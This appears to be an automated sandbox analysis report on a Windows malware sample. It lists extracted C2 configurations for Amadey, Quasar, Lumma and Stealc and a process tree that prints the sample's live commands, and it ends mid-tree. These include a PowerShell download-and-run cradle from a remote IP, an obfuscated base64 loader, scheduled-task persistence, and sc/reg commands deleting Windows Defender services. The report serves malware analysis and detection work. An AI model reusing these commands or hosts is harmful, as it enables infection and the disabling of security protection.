Analysis

  • max time kernel
    140s
  • max time network
    160s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
  • submitted
    30/03/2025, 13:33

General

  • Target

    2025-03-30_8c87bad579d801bb7bea5acc51e8fe5d_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe

  • Size

    938KB

  • MD5

    8c87bad579d801bb7bea5acc51e8fe5d

  • SHA1

    78b3bdaad59a371cf44e709e94ec00ccdc05421c

  • SHA256

    dae649137a35a584025e94fee43e229a06818d9f9e600dd9d4a6917b2e01b6cb

  • SHA512

    6fb9a96f6a83e42ae8be6b1ea00ba8417628a38e81654190f37602de36ee2ff6f1c7843eb9acd6991f254a5edfd5efc42b74af144a66fbb35b7fb410ca7692dc

  • SSDEEP

    24576:AqDEvCTbMWu7rQYlBQcBiT6rprG8a0Su:ATvC/MTQYxsWR7a0S

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

quasar

Version

1.5.0

Botnet

Office04

C2

goku92ad.zapto.org:5000

Mutex

a0766e5c-a1d1-4766-a1f5-4e4f9f9fe35a

Attributes
  • encryption_key

    BF72099FDBC6B48816529089CF1CF2CF86357D14

  • install_name

    Client.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    Quasar Modded Client Startup

  • subdirectory

    SubDir

Extracted

Family

lumma

C2

https://navstarx.shop/FoaJSi

https://metalsyo.digital/opsa

https://ironloxp.live/aksdd

https://starcloc.bet/GOksAo

https://advennture.top/GKsiio

https://targett.top/dsANGt

https://spacedbv.world/EKdlsk

https://galxnetb.today/GsuIAo

https://skynetxc.live/AksoPA

https://byteplusx.digital/aXweAX

https://travewlio.shop/ZNxbHi

https://apixtreev.run/LkaUz

https://tsparkiob.digital/KeASUp

https://appgridn.live/LEjdAK

https://cosmosyf.top/GOsznj

https://esccapewz.run/ANSbwqy

https://touvrlane.bet/ASKwjq

https://sighbtseeing.shop/ASJnzh

https://holidamyup.today/AOzkns

https://triplooqp.world/APowko

Extracted

Family

stealc

Botnet

trump

C2

http://45.93.20.28

Attributes
  • url_path

    /85a1cacf11314eb8.php

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detect Xworm Payload 2 IoCs
  • Detects Healer an antivirus disabler dropper 3 IoCs
  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

  • Gcleaner family
  • Healer

    Healer an antivirus disabler dropper.

  • Healer family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
  • Modifies security service 2 TTPs 2 IoCs
  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar family
  • Quasar payload 2 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 14 IoCs
  • Blocklisted process makes network request 6 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 12 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Creates new service(s) 2 TTPs
  • Downloads MZ/PE file 16 IoCs
  • Possible privilege escalation attempt 4 IoCs
  • Sets service image path in registry 2 TTPs 1 IoCs
  • Stops running service(s) 4 TTPs
  • .NET Reactor proctector 2 IoCs

    Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

  • Checks BIOS information in registry 2 TTPs 28 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 15 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 4 IoCs
  • Event Triggered Execution: Component Object Model Hijacking 1 TTPs

    Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.

  • Executes dropped EXE 49 IoCs
  • Identifies Wine through registry keys 2 TTPs 14 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 23 IoCs
  • Modifies file permissions 1 TTPs 4 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Windows security modification 2 TTPs 2 IoCs
  • Adds Run key to start application 2 TTPs 7 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops desktop.ini file(s) 3 IoCs
  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Boot or Logon Autostart Execution: Authentication Package 1 TTPs 1 IoCs

    Suspicious Windows Authentication Registry Modification.

  • Drops file in System32 directory 3 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 14 IoCs
  • Suspicious use of SetThreadContext 7 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 15 IoCs
  • Launches sc.exe 64 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 62 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks SCSI registry key(s) 3 TTPs 5 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 20 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
  • Kills process with taskkill 5 IoCs
  • Modifies data under HKEY_USERS 13 IoCs
  • Modifies registry class 40 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 37 IoCs
  • Suspicious use of SendNotifyMessage 27 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\2025-03-30_8c87bad579d801bb7bea5acc51e8fe5d_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
    "C:\Users\Admin\AppData\Local\Temp\2025-03-30_8c87bad579d801bb7bea5acc51e8fe5d_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:3208
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /create /tn dTEcemaIIUB /tr "mshta C:\Users\Admin\AppData\Local\Temp\jNtIOiJK0.hta" /sc minute /mo 25 /ru "Admin" /f
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:4976
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /create /tn dTEcemaIIUB /tr "mshta C:\Users\Admin\AppData\Local\Temp\jNtIOiJK0.hta" /sc minute /mo 25 /ru "Admin" /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Scheduled Task/Job: Scheduled Task
        PID:4416
    • C:\Windows\SysWOW64\mshta.exe
      mshta C:\Users\Admin\AppData\Local\Temp\jNtIOiJK0.hta
      2⤵
      • Checks computer location settings
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2868
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'A8O3NOXLW2Z6SEOA1HMAPL5BMGNXXCZR.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Downloads MZ/PE file
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4276
        • C:\Users\Admin\AppData\Local\TempA8O3NOXLW2Z6SEOA1HMAPL5BMGNXXCZR.EXE
          "C:\Users\Admin\AppData\Local\TempA8O3NOXLW2Z6SEOA1HMAPL5BMGNXXCZR.EXE"
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Checks computer location settings
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of WriteProcessMemory
          PID:2268
          • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
            "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Downloads MZ/PE file
            • Checks BIOS information in registry
            • Checks computer location settings
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Adds Run key to start application
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Modifies registry class
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:5068
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10373951121\5YB5L4K.cmd"
              6⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:2632
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\10373951121\5YB5L4K.cmd"
                7⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:3732
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiR2bWVhcnAgPSBAJw0KJHVzZXJ4Z3dOYW1lIHhndz0gJGVueGd3djpVU0V4Z3dSTkFNRXhndzskdGlzeGd3ID0gIkN4Z3c6XFVzZXhnd3JzXCR1eGd3c2VyTmF4Z3dtZVxkd3hnd20uYmF0eGd3IjtpZiB4Z3coVGVzdHhndy1QYXRoeGd3ICR0aXN4Z3cpIHsgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiQnhnd2F0Y2ggeGd3ZmlsZSB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dDeWFuO3hndyAgICAkeGd3ZmlsZUx4Z3dpbmVzIHhndz0gW1N5eGd3c3RlbS54Z3dJTy5GaXhnd2xlXTo6eGd3UmVhZEF4Z3dsbExpbnhnd2VzKCR0eGd3aXMsIFt4Z3dTeXN0ZXhnd20uVGV4eGd3dC5FbmN4Z3dvZGluZ3hnd106OlVUeGd3RjgpOyB4Z3cgICBmb3hnd3JlYWNoeGd3ICgkbGl4Z3duZSBpbnhndyAkZmlseGd3ZUxpbmV4Z3dzKSB7IHhndyAgICAgeGd3ICBpZiB4Z3coJGxpbnhnd2UgLW1heGd3dGNoICd4Z3deOjo6IHhndz8oLispeGd3JCcpIHt4Z3cgICAgIHhndyAgICAgeGd3ICBXcml4Z3d0ZS1Ib3hnd3N0ICJJeGd3bmplY3R4Z3dpb24gY3hnd29kZSBkeGd3ZXRlY3R4Z3dlZCBpbnhndyB0aGUgeGd3YmF0Y2h4Z3cgZmlsZXhndy4iIC1GeGd3b3JlZ3J4Z3dvdW5kQ3hnd29sb3IgeGd3Q3lhbjt4Z3cgICAgIHhndyAgICAgeGd3ICB0cnl4Z3cgeyAgIHhndyAgICAgeGd3ICAgICB4Z3cgICAkZHhnd2Vjb2RleGd3ZEJ5dGV4Z3dzID0gW3hnd1N5c3RleGd3bS5Db254Z3d2ZXJ0XXhndzo6RnJveGd3bUJhc2V4Z3c2NFN0cnhnd2luZygkeGd3bWF0Y2h4Z3dlc1sxXXhndy5UcmlteGd3KCkpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3ckaW5qZXhnd2N0aW9ueGd3Q29kZSB4Z3c9IFtTeXhnd3N0ZW0ueGd3VGV4dC54Z3dFbmNvZHhnd2luZ106eGd3OlVuaWN4Z3dvZGUuR3hnd2V0U3RyeGd3aW5nKCR4Z3dkZWNvZHhnd2VkQnl0eGd3ZXMpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3dXcml0ZXhndy1Ib3N0eGd3ICJJbmp4Z3dlY3Rpb3hnd24gY29keGd3ZSBkZWN4Z3dvZGVkIHhnd3N1Y2NleGd3c3NmdWx4Z3dseS4iIHhndy1Gb3JleGd3Z3JvdW54Z3dkQ29sb3hnd3IgR3JleGd3ZW47ICB4Z3cgICAgIHhndyAgICAgeGd3ICAgIFd4Z3dyaXRlLXhnd0hvc3QgeGd3IkV4ZWN4Z3d1dGluZ3hndyBpbmpleGd3Y3Rpb254Z3cgY29kZXhndy4uLiIgeGd3LUZvcmV4Z3dncm91bnhnd2RDb2xveGd3ciBZZWx4Z3dsb3c7IHhndyAgICAgeGd3ICAgICB4Z3cgICAgIHhnd0ludm9reGd3ZS1FeHB4Z3dyZXNzaXhnd29uICRpeGd3bmplY3R4Z3dpb25Db3hnd2RlOyAgeGd3ICAgICB4Z3cgICAgIHhndyAgICBieGd3cmVhazt4Z3cgICAgIHhndyAgICAgeGd3ICB9IGN4Z3dhdGNoIHhnd3sgICAgeGd3ICAgICB4Z3cgICAgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiRXhnd3Jyb3IgeGd3ZHVyaW54Z3dnIGRlY3hnd29kaW5neGd3IG9yIGV4Z3d4ZWN1dHhnd2luZyBpeGd3bmplY3R4Z3dpb24gY3hnd29kZTogeGd3JF8iIC14Z3dGb3JlZ3hnd3JvdW5keGd3Q29sb3J4Z3cgUmVkO3hndyAgICAgeGd3ICAgICB4Z3cgIH07IHhndyAgICAgeGd3ICB9OyB4Z3cgICB9O3hnd30gZWxzeGd3ZSB7ICB4Z3cgICAgV3hnd3JpdGUteGd3SG9zdCB4Z3ciU3lzdHhnd2VtIEVyeGd3cm9yOiB4Z3dCYXRjaHhndyBmaWxleGd3IG5vdCB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dSZWQ7IHhndyAgIGV4eGd3aXQ7fTt4Z3dmdW5jdHhnd2lvbiBweGd3c29nbCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGF4Z3dlc192YXhnd3I9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQWVzeGd3XTo6Q3J4Z3dlYXRlKHhndyk7CSRheGd3ZXNfdmF4Z3dyLk1vZHhnd2U9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQ2lweGd3aGVyTW94Z3dkZV06Onhnd0NCQzsJeGd3JGFlc194Z3d2YXIuUHhnd2FkZGlueGd3Zz1bU3l4Z3dzdGVtLnhnd1NlY3VyeGd3aXR5LkN4Z3dyeXB0b3hnd2dyYXBoeGd3eS5QYWR4Z3dkaW5nTXhnd29kZV06eGd3OlBLQ1N4Z3c3OwkkYXhnd2VzX3ZheGd3ci5LZXl4Z3c9W1N5c3hnd3RlbS5DeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygnVUNEeGd3ZFZ6U3Z4Z3dDMUNvOXhnd1VWb1B1eGd3RXRvVWR4Z3duNzZsQ3hndytPV0tJeGd3OG5qRGV4Z3dxTDZ4MHhndz0nKTsJeGd3JGFlc194Z3d2YXIuSXhnd1Y9W1N5eGd3c3RlbS54Z3dDb252ZXhnd3J0XTo6eGd3RnJvbUJ4Z3dhc2U2NHhnd1N0cmlueGd3ZygnK2F4Z3cvRHp3NHhnd1ZRR1g3eGd3L1J0Y0h4Z3dQQkpWd3hndz09Jyk7eGd3CSRkZWN4Z3dyeXB0b3hnd3JfdmFyeGd3PSRhZXN4Z3dfdmFyLnhnd0NyZWF0eGd3ZURlY3J4Z3d5cHRvcnhndygpOwkkeGd3cmV0dXJ4Z3duX3Zhcnhndz0kZGVjeGd3cnlwdG94Z3dyX3Zhcnhndy5UcmFueGd3c2Zvcm14Z3dGaW5hbHhnd0Jsb2NreGd3KCRwYXJ4Z3dhbV92YXhnd3IsIDAseGd3ICRwYXJ4Z3dhbV92YXhnd3IuTGVueGd3Z3RoKTt4Z3cJJGRlY3hnd3J5cHRveGd3cl92YXJ4Z3cuRGlzcHhnd29zZSgpeGd3OwkkYWV4Z3dzX3Zhcnhndy5EaXNweGd3b3NlKCl4Z3c7CSRyZXhnd3R1cm5feGd3dmFyO314Z3dmdW5jdHhnd2lvbiBzeGd3dGF4cCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGh4Z3dwaGM9Tnhnd2V3LU9ieGd3amVjdCB4Z3dTeXN0ZXhnd20uSU8ueGd3TWVtb3J4Z3d5U3RyZXhnd2FtKCwkeGd3cGFyYW14Z3dfdmFyKXhndzsJJGlzeGd3d2hiPU54Z3dldy1PYnhnd2plY3QgeGd3U3lzdGV4Z3dtLklPLnhnd01lbW9yeGd3eVN0cmV4Z3dhbTsJJHhnd2Zsc2l6eGd3PU5ldy14Z3dPYmplY3hnd3QgU3lzeGd3dGVtLkl4Z3dPLkNvbXhnd3ByZXNzeGd3aW9uLkd4Z3daaXBTdHhnd3JlYW0oeGd3JGhwaGN4Z3csIFtJT3hndy5Db21weGd3cmVzc2l4Z3dvbi5Db3hnd21wcmVzeGd3c2lvbk14Z3dvZGVdOnhndzpEZWNveGd3bXByZXN4Z3dzKTsJJHhnd2Zsc2l6eGd3LkNvcHl4Z3dUbygkaXhnd3N3aGIpeGd3OwkkZmx4Z3dzaXouRHhnd2lzcG9zeGd3ZSgpOwl4Z3ckaHBoY3hndy5EaXNweGd3b3NlKCl4Z3c7CSRpc3hnd3doYi5EeGd3aXNwb3N4Z3dlKCk7CXhndyRpc3doeGd3Yi5Ub0F4Z3dycmF5KHhndyk7fWZ1eGd3bmN0aW94Z3duIGhlenhnd2d4KCRweGd3YXJhbV94Z3d2YXIsJHhnd3BhcmFteGd3Ml92YXJ4Z3cpewkkbnhnd3g9W1N5eGd3c3RlbS54Z3dSZWZsZXhnd2N0aW9ueGd3LkFzc2V4Z3dtYmx5XXhndzo6KCdkeGd3YW9MJ1t4Z3ctMS4uLXhndzRdIC1qeGd3b2luICd4Z3cnKShbYnhnd3l0ZVtdeGd3XSRwYXJ4Z3dhbV92YXhnd3IpOwkkeGd3bGF6PSR4Z3dueC5Fbnhnd3RyeVBveGd3aW50Owl4Z3ckbGF6Lnhnd0ludm9reGd3ZSgkbnV4Z3dsbCwgJHhnd3BhcmFteGd3Ml92YXJ4Z3cpO30kaHhnd29zdC5VeGd3SS5SYXd4Z3dVSS5XaXhnd25kb3dUeGd3aXRsZSB4Z3c9ICR0aXhnd3M7JGxveGd3Zj1bU3l4Z3dzdGVtLnhnd0lPLkZpeGd3bGVdOjp4Z3coJ3R4ZXhnd1RsbEFkeGd3YWVSJ1t4Z3ctMS4uLXhndzExXSAteGd3am9pbiB4Z3cnJykoJHhnd3RpcykueGd3U3BsaXR4Z3coW0Vudnhnd2lyb25teGd3ZW50XTp4Z3c6TmV3THhnd2luZSk7eGd3Zm9yZWF4Z3djaCAoJHhnd3pwamxweGd3IGluICR4Z3dsb2YpIHhnd3sJaWYgeGd3KCR6cGp4Z3dscC5TdHhnd2FydHNXeGd3aXRoKCd4Z3c6OiAnKXhndykJewkJeGd3JGdxYnN4Z3c9JHpwanhnd2xwLlN1eGd3YnN0cml4Z3duZygzKXhndzsJCWJyeGd3ZWFrOwl4Z3d9fSRpdXhnd3A9W3N0eGd3cmluZ1t4Z3ddXSRncXhnd2JzLlNweGd3bGl0KCd4Z3dcJyk7JHhnd25sdD1zeGd3dGF4cCB4Z3cocHNvZ3hnd2wgKFtDeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygkaXVweGd3WzBdKSl4Z3cpOyRqZXhnd2J0PXN0eGd3YXhwICh4Z3dwc29nbHhndyAoW0NveGd3bnZlcnR4Z3ddOjpGcnhnd29tQmFzeGd3ZTY0U3R4Z3dyaW5nKHhndyRpdXBbeGd3MV0pKSl4Z3c7aGV6Z3hnd3ggJG5seGd3dCAkbnV4Z3dsbDtoZXhnd3pneCAkeGd3amVidCB4Z3coLFtzdHhnd3JpbmdbeGd3XV0gKCd4Z3clKicpKXhndzsNCidADQoNCiRybGpmcnAgPSAkdm1lYXJwIC1yZXBsYWNlICd4Z3cnLCAnJw0KDQpJbnZva2UtRXhwcmVzc2lvbiAkcmxqZnJwDQo=')) | Invoke-Expression"
                  8⤵
                  • Blocklisted process makes network request
                  • Command and Scripting Interpreter: PowerShell
                  • Drops startup file
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: AddClipboardFormatListener
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:1548
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\'
                    9⤵
                    • Command and Scripting Interpreter: PowerShell
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2972
            • C:\Users\Admin\AppData\Local\Temp\10374380101\e81d640be6.exe
              "C:\Users\Admin\AppData\Local\Temp\10374380101\e81d640be6.exe"
              6⤵
              • Checks computer location settings
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:4452
              • C:\Users\Admin\AppData\Local\Temp\221.exe
                "C:\Users\Admin\AppData\Local\Temp\221.exe"
                7⤵
                • Checks computer location settings
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:4552
                • C:\Windows\system32\cmd.exe
                  "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\FB77.tmp\FB78.tmp\FB79.bat C:\Users\Admin\AppData\Local\Temp\221.exe"
                  8⤵
                  • Suspicious use of WriteProcessMemory
                  PID:3584
                  • C:\Users\Admin\AppData\Local\Temp\221.exe
                    "C:\Users\Admin\AppData\Local\Temp\221.exe" go
                    9⤵
                    • Checks computer location settings
                    • Executes dropped EXE
                    • System Location Discovery: System Language Discovery
                    • Suspicious use of WriteProcessMemory
                    PID:3212
                    • C:\Windows\system32\cmd.exe
                      "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\FC32.tmp\FC33.tmp\FC34.bat C:\Users\Admin\AppData\Local\Temp\221.exe go"
                      10⤵
                      • Drops file in Program Files directory
                      • Suspicious use of WriteProcessMemory
                      PID:3780
                      • C:\Windows\system32\sc.exe
                        sc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"
                        11⤵
                        • Launches sc.exe
                        PID:1544
                      • C:\Windows\system32\sc.exe
                        sc start ddrver
                        11⤵
                        • Launches sc.exe
                        PID:1896
                      • C:\Windows\system32\timeout.exe
                        timeout /t 1
                        11⤵
                        • Delays execution with timeout.exe
                        PID:768
                      • C:\Windows\system32\sc.exe
                        sc stop ddrver
                        11⤵
                        • Launches sc.exe
                        PID:1560
                      • C:\Windows\system32\sc.exe
                        sc start ddrver
                        11⤵
                        • Launches sc.exe
                        PID:1728
                      • C:\Windows\system32\takeown.exe
                        takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
                        11⤵
                        • Possible privilege escalation attempt
                        • Modifies file permissions
                        PID:1088
                      • C:\Windows\system32\icacls.exe
                        icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t
                        11⤵
                        • Possible privilege escalation attempt
                        • Modifies file permissions
                        PID:1900
                      • C:\Windows\system32\sc.exe
                        sc stop "WinDefend"
                        11⤵
                        • Launches sc.exe
                        PID:3100
                      • C:\Windows\system32\sc.exe
                        sc delete "WinDefend"
                        11⤵
                        • Launches sc.exe
                        PID:3952
                      • C:\Windows\system32\reg.exe
                        reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
                        11⤵
                          PID:3636
                        • C:\Windows\system32\sc.exe
                          sc stop "MDCoreSvc"
                          11⤵
                          • Launches sc.exe
                          PID:3716
                        • C:\Windows\system32\sc.exe
                          sc delete "MDCoreSvc"
                          11⤵
                          • Launches sc.exe
                          PID:4236
                        • C:\Windows\system32\reg.exe
                          reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
                          11⤵
                            PID:3708
                          • C:\Windows\system32\sc.exe
                            sc stop "WdNisSvc"
                            11⤵
                            • Launches sc.exe
                            PID:2788
                          • C:\Windows\system32\sc.exe
                            sc delete "WdNisSvc"
                            11⤵
                            • Launches sc.exe
                            PID:60
                          • C:\Windows\system32\reg.exe
                            reg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f
                            11⤵
                              PID:1808
                            • C:\Windows\system32\sc.exe
                              sc stop "Sense"
                              11⤵
                              • Launches sc.exe
                              PID:4700
                            • C:\Windows\system32\sc.exe
                              sc delete "Sense"
                              11⤵
                                PID:3004
                              • C:\Windows\system32\reg.exe
                                reg delete "HKLM\System\CurrentControlset\Services\Sense" /f
                                11⤵
                                  PID:4884
                                • C:\Windows\system32\sc.exe
                                  sc stop "wscsvc"
                                  11⤵
                                    PID:976
                                  • C:\Windows\system32\sc.exe
                                    sc delete "wscsvc"
                                    11⤵
                                    • Launches sc.exe
                                    PID:2172
                                  • C:\Windows\system32\reg.exe
                                    reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f
                                    11⤵
                                    • Modifies security service
                                    PID:4184
                                  • C:\Windows\system32\sc.exe
                                    sc stop "SgrmBroker"
                                    11⤵
                                    • Launches sc.exe
                                    PID:2572
                                  • C:\Windows\system32\sc.exe
                                    sc delete "SgrmBroker"
                                    11⤵
                                    • Launches sc.exe
                                    PID:2228
                                  • C:\Windows\system32\reg.exe
                                    reg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f
                                    11⤵
                                      PID:4212
                                    • C:\Windows\system32\sc.exe
                                      sc stop "SecurityHealthService"
                                      11⤵
                                      • Launches sc.exe
                                      PID:3272
                                    • C:\Windows\system32\sc.exe
                                      sc delete "SecurityHealthService"
                                      11⤵
                                      • Launches sc.exe
                                      PID:3724
                                    • C:\Windows\system32\reg.exe
                                      reg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f
                                      11⤵
                                        PID:1920
                                      • C:\Windows\system32\sc.exe
                                        sc stop "webthreatdefsvc"
                                        11⤵
                                        • Launches sc.exe
                                        PID:4668
                                      • C:\Windows\system32\sc.exe
                                        sc delete "webthreatdefsvc"
                                        11⤵
                                          PID:1972
                                        • C:\Windows\system32\reg.exe
                                          reg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f
                                          11⤵
                                            PID:4440
                                          • C:\Windows\system32\sc.exe
                                            sc stop "webthreatdefusersvc"
                                            11⤵
                                            • Launches sc.exe
                                            PID:2612
                                          • C:\Windows\system32\sc.exe
                                            sc delete "webthreatdefusersvc"
                                            11⤵
                                            • Launches sc.exe
                                            PID:2756
                                          • C:\Windows\system32\reg.exe
                                            reg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f
                                            11⤵
                                              PID:764
                                            • C:\Windows\system32\sc.exe
                                              sc stop "WdNisDrv"
                                              11⤵
                                                PID:2764
                                              • C:\Windows\system32\sc.exe
                                                sc delete "WdNisDrv"
                                                11⤵
                                                • Launches sc.exe
                                                PID:1876
                                              • C:\Windows\system32\reg.exe
                                                reg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f
                                                11⤵
                                                  PID:3584
                                                • C:\Windows\system32\sc.exe
                                                  sc stop "WdBoot"
                                                  11⤵
                                                  • Launches sc.exe
                                                  PID:456
                                                • C:\Windows\system32\sc.exe
                                                  sc delete "WdBoot"
                                                  11⤵
                                                  • Launches sc.exe
                                                  PID:2004
                                                • C:\Windows\system32\reg.exe
